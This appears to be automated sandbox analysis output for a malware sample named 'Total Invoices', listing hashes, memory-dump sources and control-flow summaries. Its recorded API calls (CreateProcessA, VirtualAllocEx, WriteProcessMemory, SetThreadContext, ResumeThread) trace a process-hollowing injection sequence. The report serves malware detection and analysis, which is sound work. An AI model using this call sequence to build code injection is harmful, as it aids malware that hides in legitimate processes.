                                                                                        • Opcode Fuzzy Hash: 0a3f2784571ff52571bb22a8a0dda87147c00a6641b559640324caa5590e8924
                                                                                        • Instruction Fuzzy Hash: 735134B0D00249CFDB58DFAAD648B9EBBF1FB88314F208459D419AB360DB349985CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ADE006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 65fadfa270353b347e6f3c88948fff857ddeb63e6dd34991bb5e60182be7e39b
                                                                                        • Instruction ID: b71d961253425cba0c113db5b021a106c869dbb3bf206331b17cfb34ff895bbd
                                                                                        • Opcode Fuzzy Hash: 65fadfa270353b347e6f3c88948fff857ddeb63e6dd34991bb5e60182be7e39b
                                                                                        • Instruction Fuzzy Hash: 85A16FB1D0025ADFDB14CF68C8407DDBBF2BF88314F1485AAE859A7284DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ADE006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 67fb5927aba7c0c68b2b48b44c525db762653b047f1ce81a069dc5c14e70083b
                                                                                        • Instruction ID: cbee16c394cad2161951dc78968f0f62288e881174a95b394c9f6cb345bcbdac
                                                                                        • Opcode Fuzzy Hash: 67fb5927aba7c0c68b2b48b44c525db762653b047f1ce81a069dc5c14e70083b
                                                                                        • Instruction Fuzzy Hash: 5E916EB1D0021ADFDB14CF69C8407DDBBB2BF88314F1485AAE819A7254DB749D85CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 754 15eadc8-15eadd7 755 15eadd9-15eade6 call 15ea0ec 754->755 756 15eae03-15eae07 754->756 763 15eadfc 755->763 764 15eade8 755->764 758 15eae1b-15eae5c 756->758 759 15eae09-15eae13 756->759 765 15eae5e-15eae66 758->765 766 15eae69-15eae77 758->766 759->758 763->756 809 15eadee call 15eb060 764->809 810 15eadee call 15eb051 764->810 765->766 767 15eae9b-15eae9d 766->767 768 15eae79-15eae7e 766->768 773 15eaea0-15eaea7 767->773 770 15eae89 768->770 771 15eae80-15eae87 call 15ea0f8 768->771 769 15eadf4-15eadf6 769->763 772 15eaf38-15eaff8 769->772 777 15eae8b-15eae99 770->777 771->777 804 15eaffa-15eaffd 772->804 805 15eb000-15eb02b GetModuleHandleW 772->805 774 15eaea9-15eaeb1 773->774 775 15eaeb4-15eaebb 773->775 774->775 778 15eaebd-15eaec5 775->778 779 15eaec8-15eaeca call 15ea108 775->779 777->773 778->779 783 15eaecf-15eaed1 779->783 785 15eaede-15eaee3 783->785 786 15eaed3-15eaedb 783->786 787 15eaee5-15eaeec 785->787 788 15eaf01-15eaf0e 785->788 786->785 787->788 790 15eaeee-15eaefe call 15ea118 call 15ea128 787->790 794 15eaf10-15eaf2e 788->794 795 15eaf31-15eaf37 788->795 790->788 794->795 804->805 806 15eb02d-15eb033 805->806 807 15eb034-15eb048 805->807 806->807 809->769 810->769
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 015EB01E
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: b2f7b2794a8f829edf4f545fe57df4f332c5623789094897e3119c5640ce4ae5
• Instruction ID: 85f6fb9c033ff225b4ae1ba39183a44aa8a0b6891f5df45cbb3b485324ba0314
• Opcode Fuzzy Hash: b2f7b2794a8f829edf4f545fe57df4f332c5623789094897e3119c5640ce4ae5
• Instruction Fuzzy Hash: CF712370A00B068FDB28DF79D55875ABBF1BF88300F008A2DD49ADBA50D775E949CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 811 15e590c-15e59d9 CreateActCtxA 813 15e59db-15e59e1 811->813 814 15e59e2-15e5a3c 811->814 813->814 821 15e5a3e-15e5a41 814->821 822 15e5a4b-15e5a4f 814->822 821->822 823 15e5a60 822->823 824 15e5a51-15e5a5d 822->824 825 15e5a61 823->825 824->823 825->825
APIs
• CreateActCtxA.KERNEL32(?), ref: 015E59C9
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b3fd0900970ec540d92e59320a7dc96462ff1c7a06d831e0b8bd492333a23a76
• Instruction ID: 146fd31d686667f4387768e08ad517259e3cb11ff44cc4b9644567c2c3f692cc
• Opcode Fuzzy Hash: b3fd0900970ec540d92e59320a7dc96462ff1c7a06d831e0b8bd492333a23a76
• Instruction Fuzzy Hash: D241F1B4C00719CFDB24CFA9C884ADEBBF5BF49304F24816AD408AB255DB756985CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 827 15e44b4-15e59d9 CreateActCtxA 830 15e59db-15e59e1 827->830 831 15e59e2-15e5a3c 827->831 830->831 838 15e5a3e-15e5a41 831->838 839 15e5a4b-15e5a4f 831->839 838->839 840 15e5a60 839->840 841 15e5a51-15e5a5d 839->841 842 15e5a61 840->842 841->840 842->842
APIs
• CreateActCtxA.KERNEL32(?), ref: 015E59C9
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 5dec6ff5bf65f123c7d0431d94cab799645e8252f15372ddf2b66481532d78e5
• Instruction ID: e617aa8de1f33ab9a6d7f405c8d5bdaf7388a6ce78017787cd8fe28822cf9b8d
• Opcode Fuzzy Hash: 5dec6ff5bf65f123c7d0431d94cab799645e8252f15372ddf2b66481532d78e5
• Instruction Fuzzy Hash: 2A41D2B4C1071DCBDB24CFA9C9446DDBBF5BF49304F24806AD408AB255EBB56945CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 854 7addb48-7addb96 856 7addb98-7addba4 854->856 857 7addba6-7addbe5 WriteProcessMemory 854->857 856->857 859 7addbee-7addc1e 857->859 860 7addbe7-7addbed 857->860 860->859
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07ADDBD8
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 588741e09a68cb49c12927f6a302f33ab82397c3f36615100552e4033f17ed9e
• Instruction ID: 7d11caa299aadf212f0f7cedcccedad3b40b357fcf53a3386a728da563a93728
• Opcode Fuzzy Hash: 588741e09a68cb49c12927f6a302f33ab82397c3f36615100552e4033f17ed9e
• Instruction Fuzzy Hash: 192139B59003599FCB10DFA9C885BDEBBF5FF88314F10842AE959A7250C778A944CBA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 844 7addb40-7addb96 846 7addb98-7addba4 844->846 847 7addba6-7addbe5 WriteProcessMemory 844->847 846->847 849 7addbee-7addc1e 847->849 850 7addbe7-7addbed 847->850 850->849
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07ADDBD8
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 247eb2e1c4f2b7449c383ac2a3942ac11986df6bc0ce9e3a591bd3813badf33b
• Instruction ID: 7fcaa18840970db9d7858cbc69c17594e56bf2a20c455f33ca9d12f12d9ad0f5
• Opcode Fuzzy Hash: 247eb2e1c4f2b7449c383ac2a3942ac11986df6bc0ce9e3a591bd3813badf33b
• Instruction Fuzzy Hash: 222177B69003599FCB00CFA9C881BDEBBF1FF88314F10842AE919A7240C7789940CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07ADD5F6
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 1b0eeff700febc146a2ef28541d535202ce660771cd5935ebb7be859a263a243
• Instruction ID: e7e767839dcdfacb48a56ac7b8f1999944e02137d7718becf0720f88ec89f810
• Opcode Fuzzy Hash: 1b0eeff700febc146a2ef28541d535202ce660771cd5935ebb7be859a263a243
• Instruction Fuzzy Hash: 322149B5D003498FDB10DFA9C5857EEBFF4AF88314F54842AD469A7240C7789984CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07ADD5F6
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: a4527c6cb221bce3a946fe4e11d44e8fbf018b8ad29ddd1c21434d9fbc85bfb8
• Instruction ID: 20ca23c4bb686a1a980bf46ecfeed7ca45fbb09afc1802263b7d0b9f3ec2e5f0
• Opcode Fuzzy Hash: a4527c6cb221bce3a946fe4e11d44e8fbf018b8ad29ddd1c21434d9fbc85bfb8
• Instruction Fuzzy Hash: E42149B1D003498FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB789944CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ADDCB8
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 5c3bcc173be12ca469d331a1852468f0e86c2119bef76700e7941dccabf362c8
• Instruction ID: a957aca88883641050052260ff8912e7ba4225e03abbf140dff8bf859c58e83d
• Opcode Fuzzy Hash: 5c3bcc173be12ca469d331a1852468f0e86c2119bef76700e7941dccabf362c8
• Instruction Fuzzy Hash: 4C2109B1D003599FCB10DFAAC945ADEFBF5FF88310F10842AE559A7250C7749944CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ADDCB8
Memory Dump Source
• Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 7b1a0fbce22a9b75d080a3d49ef0e83a2a96a7bbce6fc31bb1a0a881a9da8fd2
• Instruction ID: b3adc240437a77766fba966a86986411b736ebb7eca26244bab9eadf0f5c9c34
• Opcode Fuzzy Hash: 7b1a0fbce22a9b75d080a3d49ef0e83a2a96a7bbce6fc31bb1a0a881a9da8fd2
• Instruction Fuzzy Hash: EC2114B19002599FCB10DFAAC981AEEBBF5FF48310F10842AE559A7250C7789944CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED737
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: a442d2ff8d9098cb7369d19c353b286138a03a31da1dca473abb55847bae799a
• Instruction ID: 086984400d3cd9cddebf5b453a4833a09bddd6538595b65221c49bb71aa801ee
• Opcode Fuzzy Hash: a442d2ff8d9098cb7369d19c353b286138a03a31da1dca473abb55847bae799a
• Instruction Fuzzy Hash: 3A21B3B5D002589FDB10CFAAD584ADEBBF8FB48310F14841AE954A7250D374A944CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED737
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 2a6cc639ed94b4f3640daffd6b269b545093675d032c00bb46abbd83c814a55f
• Instruction ID: 4c8c362ed69601a2ff7a850ad45f55c1113165cd17a4f0a117372c7b76fc1178
• Opcode Fuzzy Hash: 2a6cc639ed94b4f3640daffd6b269b545093675d032c00bb46abbd83c814a55f
• Instruction Fuzzy Hash: 2421E0B5D00259DFDB10CFAAD984AEEBBF4FB48320F14841AE958B7210C374A944CFA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB099,00000800,00000000,00000000), ref: 015EB2AA
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: b6bd24a64b23beeac2e5a4d09e0ae003bdab7100639f2338d19105b10e5750d4
• Instruction ID: 0ea1bde2b57dc0fb3d147b14189956792059ecd0a31ac374cf13a0747d6294af
• Opcode Fuzzy Hash: b6bd24a64b23beeac2e5a4d09e0ae003bdab7100639f2338d19105b10e5750d4
• Instruction Fuzzy Hash: E311E4B6D002499FDB14CF9AC448ADEFBF4FF88310F10842AD519AB210C375A945CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB099,00000800,00000000,00000000), ref: 015EB2AA
Memory Dump Source
• Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 27c8f4d4f0b070a16aef2995d45ee915f8a2bc2a5979d0fe9df9b5997f08b34d
• Instruction ID: e36c3a6e3f9255e5133cfa747ab2deabe6aac57cacf370d0cd52c3eead0173ae
                                                                                        • Opcode Fuzzy Hash: 27c8f4d4f0b070a16aef2995d45ee915f8a2bc2a5979d0fe9df9b5997f08b34d
                                                                                        • Instruction Fuzzy Hash: 9811D0B6D003499FDB14CFAAC448A9EBBF4AF88320F14842AD519AB210C375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ADDAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9523e2056779a8520ce15748c53af6a4dc2cc6b306f60787041a2e499507565a
                                                                                        • Instruction ID: 1be9a2e67c2f678e10a4a7256997ba525d8e7c34bc1e8dd5d4e404c2d4c304e7
                                                                                        • Opcode Fuzzy Hash: 9523e2056779a8520ce15748c53af6a4dc2cc6b306f60787041a2e499507565a
                                                                                        • Instruction Fuzzy Hash: 8F1137B19002499FCB10DFAAC844BEFBFF5EF88324F20841AE559A7250C775A944CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ADDAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 43d63e846ff267c6ca43c00463cfb5ed262b8bd0bd4a396ccb6e7e25d271ea83
                                                                                        • Instruction ID: 43e0f72c68d38000ccd4ece64e6ce375bd773caff9f46d9213d1218e9234f55e
                                                                                        • Opcode Fuzzy Hash: 43d63e846ff267c6ca43c00463cfb5ed262b8bd0bd4a396ccb6e7e25d271ea83
                                                                                        • Instruction Fuzzy Hash: 24116AB69002499FCB10DFA9C845BEEBFF5AF88320F24841AE559A7250C7799950CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: fcafcfa73e55478c26a728b7731d104d9f95b146c506500887c4d685b6712bbe
                                                                                        • Instruction ID: 0a0a4015395597718ebfc2d829264f377f14888800c0d89e153ea5864a02be36
                                                                                        • Opcode Fuzzy Hash: fcafcfa73e55478c26a728b7731d104d9f95b146c506500887c4d685b6712bbe
                                                                                        • Instruction Fuzzy Hash: A4113AB1D002598FCB10DFAAC4457EEFFF4EB88324F20842AD559A7250C775A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 53785aa783d80d4c7573c09867a5c8ece2cf52e5227327457b69374067c148e0
                                                                                        • Instruction ID: 6c79a84adef3c90a0ffc320a06e18f3087dd27343a714827dfd674885dd7e6f3
                                                                                        • Opcode Fuzzy Hash: 53785aa783d80d4c7573c09867a5c8ece2cf52e5227327457b69374067c148e0
                                                                                        • Instruction Fuzzy Hash: 2D116AB1D00259CFDB10DFAAC4457EEFFF4AB88324F20882AC059A7240C735A944CF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015EB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: b6963af92e2f5af8350be8b9cd566d6759917dc9c600876cca8fe511d23d8614
                                                                                        • Instruction ID: 3185243be3dc9322f71c4f007989f0ef1b9d629bd7e90ad5ef4c5cc11cd813ec
                                                                                        • Opcode Fuzzy Hash: b6963af92e2f5af8350be8b9cd566d6759917dc9c600876cca8fe511d23d8614
                                                                                        • Instruction Fuzzy Hash: 0B11E0B5C003498FDB14CF9AD448BDEFBF4AB88324F10842AD569AB210D375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0DE429FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: b6b7cb9fc7185001dd604acfa0c3005b8e194b5176a87b14e70bea39af48c5d9
                                                                                        • Instruction ID: ef1aa7c992a637977a84dfee719523656504e6e0ba2647c015966a21dac65dcb
                                                                                        • Opcode Fuzzy Hash: b6b7cb9fc7185001dd604acfa0c3005b8e194b5176a87b14e70bea39af48c5d9
                                                                                        • Instruction Fuzzy Hash: 971133B5800349CFDB10CF99D585BEEFBF4EB48320F10841AE958A7240C375A584CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0DE429FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 5b778d999df42f52325e946561770a895a56325bd1c8c0279efc6fd4f0b2307d
                                                                                        • Instruction ID: 005fb877a15e858259d4b7ba12d9b7993bc2aba2e2d2f57a17afa35a2d69b0b8
                                                                                        • Opcode Fuzzy Hash: 5b778d999df42f52325e946561770a895a56325bd1c8c0279efc6fd4f0b2307d
                                                                                        • Instruction Fuzzy Hash: 9311D3B58003499FDB10DF9AD445BDEFBF8EB48324F108419E558A7250C375A584CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9fad40844872c349c984de2bb0245abcd3a28e4f9594c3262b0c342d0ebdf3eb
                                                                                        • Instruction ID: d2d28d36e8159dd8e8cc71a2703986964778df94d9aa4d08b27863317cc8d071
                                                                                        • Opcode Fuzzy Hash: 9fad40844872c349c984de2bb0245abcd3a28e4f9594c3262b0c342d0ebdf3eb
                                                                                        • Instruction Fuzzy Hash: 3A214871100204DFDB01EF48D9C0B5ABFF5FB84324F20C569D9091F2A6C376E446C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42af7f49a83032e5b1d764c66fb59ab05491b39c6c3ec80b7b76729f551e56d8
                                                                                        • Instruction ID: 93beb6c6adff93947a85d51895cdeb47e05f0dc6a231ca95e08b9c1ee3614b5c
                                                                                        • Opcode Fuzzy Hash: 42af7f49a83032e5b1d764c66fb59ab05491b39c6c3ec80b7b76729f551e56d8
                                                                                        • Instruction Fuzzy Hash: C721C171504240DFDB05EF58D9C0B2ABFF5FB88318F24C56AE9095E296C336D456CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3e6e9c297b11e33f1e582f025835e8a7dba1fe33c07860a628e2e7df772f263
                                                                                        • Instruction ID: 00dfbe48ba87d42ea57407b0dffe9910d865167b8039cd5d593a6a31dea570b3
                                                                                        • Opcode Fuzzy Hash: b3e6e9c297b11e33f1e582f025835e8a7dba1fe33c07860a628e2e7df772f263
                                                                                        • Instruction Fuzzy Hash: 2B210071604200DFDF15DF68D984B2ABBB5FB84354F20C969D80A4F256D33AD446CA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f175dc31adaa1ed8147230e0421d10199baad82a2383d2e4fa16ca46816fe51
                                                                                        • Instruction ID: 984a775e48c46cb2318fb3b499445bcc9df67e4264e17f26c72b421331ae5429
                                                                                        • Opcode Fuzzy Hash: 4f175dc31adaa1ed8147230e0421d10199baad82a2383d2e4fa16ca46816fe51
                                                                                        • Instruction Fuzzy Hash: 0A212971504200DFDF05DF98D6C0B2ABBB5FB84324F24C9ADD9094F296C33AD446CA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad12d037e148dd97e183e04848247494c9e249270dc2dec521abfcd6f1db811e
                                                                                        • Instruction ID: 07e1db9252aba8b810ec0cf09e98012d91cc805873e04b90b2a0c6060f6e1bd2
                                                                                        • Opcode Fuzzy Hash: ad12d037e148dd97e183e04848247494c9e249270dc2dec521abfcd6f1db811e
                                                                                        • Instruction Fuzzy Hash: 5B219D755093808FDB03CF64D994B15BF71FB46214F28C5EAD8498F2A7C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
